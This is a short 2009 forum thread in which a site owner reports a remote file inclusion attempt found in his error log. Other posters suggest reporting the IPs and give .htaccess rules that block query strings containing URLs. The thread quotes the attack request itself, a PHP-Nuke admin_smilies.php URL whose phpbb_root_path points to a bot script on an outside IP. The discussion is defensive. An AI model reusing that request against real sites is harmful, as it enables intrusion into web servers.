I found someone doing something fishy using txt files

Posted: Sun Sep 20, 2009 6:18 pm

i have an error log on my site to aid me in missing files images see who was trying what url and so on and i came accross these in my logs you have to take the spaces out as it wouldnt let me post

nunuke.co.uk/modules/Forums / admin/admin_smilies.php? phpbb_root_path = http :// 200.209.69.194 /bot / fx29id.txt ? ?

now if you visit [ Only registered users can see links on this board! Get registered or login! ]
you will see a list of hacking txt file tools does anybody know of anyway to getmy own back in someway i searched the ip and its in brazil but they are using another ip located on U.S hosting to act as the ip to visit my site i am not very clued up at what any of these files do but looking at one it looks like it trys to access the hosting info and grab passwords and hijack it and store txt files

im not worried about this find as my error log spits a 403 at them but what would it do if i had the error logging off?? who knows but i dont wonna find out

Posted: Sun Sep 20, 2009 9:11 pm

There are automated bot tools... lots are out there. I'm not sure what you want to do. These attempts should be blocked by NukeSentinel.

You can try and report those IPs to their host. Some of them will respond while others just won't.

Worker Joined: Aug 26, 2007 Posts: 236

It is cross scripting, which you can block also in .htaccess by this:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]